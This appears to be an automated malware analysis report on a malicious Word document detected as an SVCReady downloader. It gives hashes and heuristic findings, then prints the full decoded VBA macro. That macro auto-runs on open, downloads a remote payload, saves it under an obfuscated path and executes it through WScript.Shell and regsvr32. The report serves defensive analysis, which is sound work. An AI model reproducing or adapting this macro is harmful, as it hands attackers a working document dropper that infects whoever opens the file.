Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 22b51dd1d452b515…

MALICIOUS

Office (OOXML)

113.5 KB Created: 2020-07-20 08:49:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: 37f424d4db6ebbeaa9259ec0a65629eb SHA-1: 71dcf178cb71d503a42999e18d469ab6df06e5c0 SHA-256: 22b51dd1d452b515d73da1ebf5fd9b238c5ab5718b52c7cff76e3cc2c2297a77
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that executes upon opening, leveraging WScript.Shell to run a command. The macro appears to be designed to download and execute a second-stage payload, as indicated by the use of CreateObject("wscript.shell") and the Shell() call. The reconstructed command line points to a specific file path and name, suggesting a downloader functionality.

Heuristics 8

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    bb864e29 f6f001f2(ac3277cb), a2fc3aed
Set ad905639 = CreateObject("wscript.shell")
Call ad905639.exec(be9702bb & " " & f6f001f2(ac3277cb))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    bb864e29 f6f001f2(ac3277cb), a2fc3aed
Set ad905639 = CreateObject("wscript.shell")
Call ad905639.exec(be9702bb & " " & f6f001f2(ac3277cb))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub AutoOpen()
Dim d4c7a3bb As New ab62edb2
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3683 bytes
SHA-256: 372dc167ee10a8795176cc7684b03d9e8d6bed0ae1d81ea6dc269b0794eff8ca
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fef5b37b"
Public Const ac3277cb As String = "c5:9\4p7rdoegarfaem4d6a1t6a3\54b690f0d90.2j9p7g1"
Function da2a0928()
da2a0928 = 13167 / 77
End Function
Function a8b572de()
a8b572de = Application.ActiveDocument.AutoFormatOverride
End Function
Sub AutoOpen()
Dim d4c7a3bb As New ab62edb2
aaa = f6f001f2(db93317a)
a2fc3aed = d4c7a3bb.baac76f5(aaa, "")
bb864e29 f6f001f2(ac3277cb), a2fc3aed
Set ad905639 = CreateObject("wscript.shell")
Call ad905639.exec(be9702bb & " " & f6f001f2(ac3277cb))
End Sub

Attribute VB_Name = "e3294a28"
Function a80b1e67()
a80b1e67 = ActiveWindow.WindowState
End Function
Function c9dc402c() As Long
Dim dcdbe278 As Integer
Dim da9618dd As Long
da9618dd = 72
For dcdbe278 = 11 To 93
da9618dd = da9618dd - dcdbe278
Next dcdbe278
c9dc402c = da9618dd
End Function
Sub bb864e29(b680c450, de17f8da)
Dim db5447b6
db5447b6 = FreeFile
Open b680c450 For Output As #db5447b6
Print #db5447b6, e4ddd386(de17f8da)
Close #db5447b6
End Sub
Function eea3a0a3(d199cac5, bc2aba91)
eea3a0a3 = Mid(d199cac5, bc2aba91, 1)
End Function
Function b704ddcf()
b704ddcf = False
End Function
Function d42642fe()
d42642fe = -1009213502
End Function
Function f6f001f2(d1de0d54)
For bc2aba91 = 1 To Len(d1de0d54) Step 2
cf392226 = cf392226 & eea3a0a3(d1de0d54, bc2aba91)
Next
f6f001f2 = cf392226
End Function
Function c6664657()
c6664657 = ActiveWindow.EnvelopeVisible
End Function
Function fa314a3b()
fa314a3b = Application.ActiveDocument.AutoSaveOn
End Function
Sub c4175648()
End Sub
Function cd23e527()
cd23e527 = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function f3b16c07(d87530d2np As String) As Boolean
If Len(d87530d2np) <> 465 Then
f3b16c07 = True
End If
End Function
Function e4ddd386(de17f8da)
e4ddd386 = StrConv(de17f8da, 64)
End Function
Function a929515a()
a929515a = Application.ActiveDocument.AutoSaveOn
End Function
Function b9b76436()
b9b76436 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function db93317a()
db93317a = ActiveDocument.Shapes(1).AlternativeText
End Function
Function c1222e28()
c1222e28 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function b17c6f37() As Long
Dim b174c3b5 As Integer
Dim b1e23628 As Long
b1e23628 = 76
For b174c3b5 = 4 To 59
b1e23628 = b1e23628 + b174c3b5
Next b174c3b5
b17c6f37 = b1e23628
End Function
Function be9702bb()
be9702bb = f6f001f2("raedg0s8vfrc3522")
End Function

Attribute VB_Name = "ab62edb2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f259e827()
f259e827 = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function dacaac59()
dacaac59 = ActiveWindow.SplitVertical
End Function
Function baac76f5(d6a5aec0, cac1bb91)
Dim f4f6be01 As Object
Set f4f6be01 = New MSXML2.XMLHTTP60
Call f4f6be01.Open("GET", d6a5aec0, False)
f4f6be01.Send
baac76f5 = f4f6be01.responsebody
End Function
Function c0f635c0()
c0f635c0 = Application.ActiveDocument.Application
End Function
Function bf27c0f4()
bf27c0f4 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function f76472d4(ea814351)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 24576 bytes
SHA-256: ddcf41b1b639f25157feaabb3fba87dd8b5b4a3391f58df1307ff5064ab4056f

Open this report in the interactive analyzer, or submit your own file for analysis.